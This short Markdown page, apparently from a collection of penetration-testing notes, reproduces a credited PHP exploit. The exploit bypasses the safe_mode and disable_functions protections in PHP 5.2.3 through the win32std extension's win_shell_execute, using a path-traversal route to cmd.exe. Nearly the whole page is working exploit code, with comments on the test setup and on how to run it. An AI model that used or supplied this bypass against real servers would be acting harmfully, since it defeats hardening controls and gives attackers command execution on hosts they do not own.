31 lines
1018 B
Markdown
31 lines
1018 B
Markdown
|
# disable\_functions bypass - PHP 5.2.3 - Win32std ext Protections Bypass
|
||
|
|
|
||
|
|
## PHP 5.2.3 - Win32std ext Protections Bypass
|
||
|
|
|
||
|
|
From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
|
||
|
|
|
||
|
|
```php
|
||
|
|
<?php
|
||
|
|
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
|
||
|
|
|
||
|
|
//author: shinnai
|
||
|
|
//mail: shinnai[at]autistici[dot]org
|
||
|
|
//site: http://shinnai.altervista.org
|
||
|
|
|
||
|
|
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
|
||
|
|
|
||
|
|
//Thanks to rgod for all his precious advises :)
|
||
|
|
|
||
|
|
//I set php.ini in this way:
|
||
|
|
//safe_mode = On
|
||
|
|
//disable_functions = system
|
||
|
|
//if you launch the exploit from the cli, cmd.exe will be wxecuted
|
||
|
|
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager
|
||
|
|
|
||
|
|
if (!extension_loaded("win32std")) die("win32std extension required!");
|
||
|
|
system("cmd.exe"); //just to be sure that protections work well
|
||
|
|
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
|
||
|
|
?>
|
||
|
|
```
|
||
|
|
|